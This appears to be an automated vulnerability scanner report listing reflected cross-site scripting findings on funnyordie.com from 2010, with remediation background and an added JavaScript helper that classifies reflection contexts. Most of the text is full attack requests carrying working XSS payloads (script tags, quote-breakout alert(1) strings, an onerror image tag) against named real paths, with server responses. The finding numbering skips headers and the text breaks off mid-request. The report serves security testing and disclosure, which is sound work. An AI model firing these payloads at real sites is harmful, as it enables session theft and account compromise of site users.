Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad2ac"-alert(1)-"99ab9bfdf80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/blogs?ad2ac"-alert(1)-"99ab9bfdf80=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "04bfd8e981194b0795534bf0a2e57857"
X-Runtime: 712
X-Varnish: 1401120260
X-Varnish: 1264352257
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:05:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123267
1.2. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b95"><script>alert(1)</script>0d4686e2561 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/blogs?46b95"><script>alert(1)</script>0d4686e2561=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "5e29e31bdb0d11117ba24e1bfd57aee4"
X-Runtime: 267
X-Varnish: 1401119597
X-Varnish: 573897546
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:04:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123966
1.3. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa9a8'-alert(1)-'a7f0c877632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/blogs?fa9a8'-alert(1)-'a7f0c877632=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "45609011d600218ec37219b601e7bf61"
X-Runtime: 687
X-Varnish: 1401121108
X-Varnish: 1264353438
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:06:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:06:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123281
1.4. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4d4'-alert(1)-'a9d31933d36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images?3f4d4'-alert(1)-'a9d31933d36=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "e6864e54292158dee26cb49532544be9"
X-Runtime: 341
X-Varnish: 1401116160
X-Varnish: 1264347507
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:01:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121932
1.5. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb82"><script>alert(1)</script>f1825de2556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images?3cb82"><script>alert(1)</script>f1825de2556=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "868b548cb92a9867e0b0b74216295c63"
X-Runtime: 531
X-Varnish: 1401114714
X-Varnish: 1264345745
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:00:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122624
1.6. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7310f"-alert(1)-"b0f9bb66cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images?7310f"-alert(1)-"b0f9bb66cab=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "a1f74186001c46ed735487e56cc4f58b"
X-Runtime: 261
X-Varnish: 1401114965
X-Varnish: 1264346074
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:00:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:00:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121881
1.7. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e23"-alert(1)-"838fc2f6f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_recent?f1e23"-alert(1)-"838fc2f6f86=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "7bba1aa173f991713adf91a31fa8e68a"
X-Runtime: 561
X-Varnish: 1401118589
X-Varnish: 573896216
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:03:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:03:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121754
1.8. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff299'-alert(1)-'ff3162767b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_recent?ff299'-alert(1)-'ff3162767b4=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "2c8633ec87ebe960dd4cc845e2cbf6c5"
X-Runtime: 598
X-Varnish: 1401119321
X-Varnish: 573897218
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:04:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121744
1.9. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d770a"><script>alert(1)</script>3d31a68f80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_recent?d770a"><script>alert(1)</script>3d31a68f80=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "feec6295d6ee085c9665dcc08c1e76d4"
X-Runtime: 558
X-Varnish: 1401117408
X-Varnish: 1264348922
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:02:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:02:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122424
1.10. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea97'-alert(1)-'45011e44222 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed?9ea97'-alert(1)-'45011e44222=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "188d9fe3f1ddb438fdbd7a8bf7d96b5d"
X-Runtime: 619
X-Varnish: 1401116827
X-Varnish: 1264348200
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:02:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122214
1.11. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa4a"><script>alert(1)</script>789c9c757f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_viewed?7aa4a"><script>alert(1)</script>789c9c757f3=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "df5578b34ce135689d9baf1a15314d61"
X-Runtime: 710
X-Varnish: 1401116047
X-Varnish: 573892804
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:01:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:01:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123066
1.12. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d6"-alert(1)-"8b9e8de4647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed?610d6"-alert(1)-"8b9e8de4647=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "877bec39a4609ae2d4a7d50ad3dd0c20"
X-Runtime: 684
X-Varnish: 1401116493
X-Varnish: 1264347857
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:01:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:01:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122274
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccea8"><a>036c17bad81 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /browse/images/all/all/most_viewed/this_monthccea8"><a>036c17bad81 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "a21ead4c84275299756a1b65013ac4c4"
X-Runtime: 2063
X-Varnish: 1401168768
X-Varnish: 573955438
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:56:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:56:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121497
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9ef81<img%20src%3da%20onerror%3dalert(1)>75c9debcdc8 was submitted in the REST URL parameter 6. This input was echoed as 9ef81<img src=a onerror=alert(1)>75c9debcdc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/images/all/all/most_viewed/this_month9ef81<img%20src%3da%20onerror%3dalert(1)>75c9debcdc8 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "4b0cc22cb5b3786188cdd605d3fab396"
X-Runtime: 1788
X-Varnish: 1401171466
X-Varnish: 1264412516
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:58:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:58:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122628
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b1d5'-alert(1)-'5573df1f8f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month2b1d5'-alert(1)-'5573df1f8f6 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "971393735a98e033a0295cd1f0a98592"
X-Runtime: 1877
X-Varnish: 1401170666
X-Varnish: 1264411705
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:58:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121490
<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="search" type="application/opensearchdescription+xml" title=
...[SNIP]...
ML = 'Thanks for your tweet'; } }); });
$('twitter_action_area').show();
GA.event('sharing','twitter_share','"/browse/images/all/all/most_viewed/this_month2b1d5'-alert(1)-'5573df1f8f6"');
}); } });
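The response fragment above shows the sink behind most of these findings: the request URL is dropped into the third argument of GA.event between single quotes, so a single quote in the path or in a parameter name terminates the string. The following is an added example, not the scanner's code or the site's, that locates every unmodified reflection of a canary in a response body and classifies the syntactic context it landed in, which is what wording such as "copied into a JavaScript string which is encapsulated in single quotation marks" summarises. The sample body is constructed from the fragment above with an attribute reflection and a text reflection added for contrast; the function names are this example's own. The quote walker ignores comments, regex literals and template expressions, so treat its answer as a starting point for the manual examination the tag-injection finding earlier recommends, not a verdict.

```javascript
// Added example (not the scanner's code): find each reflection of a canary
// in a response body and classify its context, which is how findings of the
// form "copied into a JavaScript string encapsulated in single quotation
// marks" are derived. SAMPLE_BODY is constructed from the GA.event fragment
// in the report, with an attribute and a text reflection added.

const CANARY = "2b1d5'-alert(1)-'5573df1f8f6";
const SAMPLE_BODY =
  '<html><head>' +
  '<link rel="canonical" href="/browse/images/all/all/most_viewed/this_month' + CANARY + '">' +
  '</head><body><h1>this_month' + CANARY + '</h1>' +
  "<script>GA.event('sharing','twitter_share','\"/browse/images/all/all/most_viewed/this_month" +
  CANARY + "\"');</script></body></html>";

// One classification per unmodified occurrence of the canary. An empty
// array means the canary came back encoded, altered, or not at all.
function classifyReflections(body, canary) {
  const hits = [];
  let idx = body.indexOf(canary);
  while (idx >= 0) {
    hits.push(contextAt(body, idx));
    idx = body.indexOf(canary, idx + canary.length);
  }
  return hits;
}

// Decide the context from the text *before* the reflection only, so the
// canary's own quote characters cannot influence the answer.
function contextAt(body, idx) {
  const before = body.slice(0, idx);
  const lower = before.toLowerCase();
  const lastOpen = lower.lastIndexOf('<script');
  const lastClose = lower.lastIndexOf('</script');
  if (lastOpen > lastClose) {
    // Inside an unclosed <script>: walk the script text for an open string.
    const scriptStart = before.indexOf('>', lastOpen) + 1;
    const quote = openJsQuote(before.slice(scriptStart));
    return quote ? { context: 'js-string', quote } : { context: 'js-code' };
  }
  const lt = before.lastIndexOf('<');
  const gt = before.lastIndexOf('>');
  if (lt > gt) {
    // Inside an unclosed tag: is an attribute value open, and with what?
    const quote = openAttrQuote(before.slice(lt));
    return quote ? { context: 'attribute', quote } : { context: 'tag' };
  }
  return { context: 'text' };
}

// Walk JavaScript source and return the string delimiter still open at the
// end, or null. Backslash escapes are honoured; comments, regex literals and
// template expressions are not tracked (heuristic, confirm by hand).
function openJsQuote(src) {
  let open = null;
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    if (open) {
      if (c === '\\') i++;
      else if (c === open) open = null;
    } else if (c === "'" || c === '"' || c === '`') {
      open = c;
    }
  }
  return open;
}

// Same walk for the inside of a tag: only ' and " delimit values, no escapes.
function openAttrQuote(tagText) {
  let open = null;
  for (const c of tagText) {
    if (open) { if (c === open) open = null; }
    else if (c === '"' || c === "'") open = c;
  }
  return open;
}

console.log(classifyReflections(SAMPLE_BODY, CANARY));
```

Run against the constructed body this reports an attribute reflection delimited by double quotes, a text reflection, and a script-string reflection delimited by single quotes; the last of these is the context the findings above describe, and the quote character it reports is the one the report's payloads had to use to break out. Because classification uses only the text preceding the reflection, a canary that contains quotes (as these payloads do) is handled the same as a plain alphanumeric one.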
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7096"-alert(1)-"8668f9962bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_monthf7096"-alert(1)-"8668f9962bf HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "84f97a092847f7c860f75617b56aeba5"
X-Runtime: 1726
X-Varnish: 1401170270
X-Varnish: 1264411338
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:57:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:57:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121664
1.17. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84400'-alert(1)-'67b9bc7bb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month?84400'-alert(1)-'67b9bc7bb03=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "e0a78be7b2b5d1e788325cd224a8cde6"
X-Runtime: 472
X-Varnish: 1401120053
X-Varnish: 1264351949
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123028
<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="search" type="application/opensearchdescription+xml" title=
...[SNIP]...
L = 'Thanks for your tweet'; } }); });
$('twitter_action_area').show();
GA.event('sharing','twitter_share','"/browse/images/all/all/most_viewed/this_month?84400'-alert(1)-'67b9bc7bb03=1"');
}); } });
1.18. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa74"><script>alert(1)</script>8dc27669d83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_viewed/this_month?faa74"><script>alert(1)</script>8dc27669d83=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
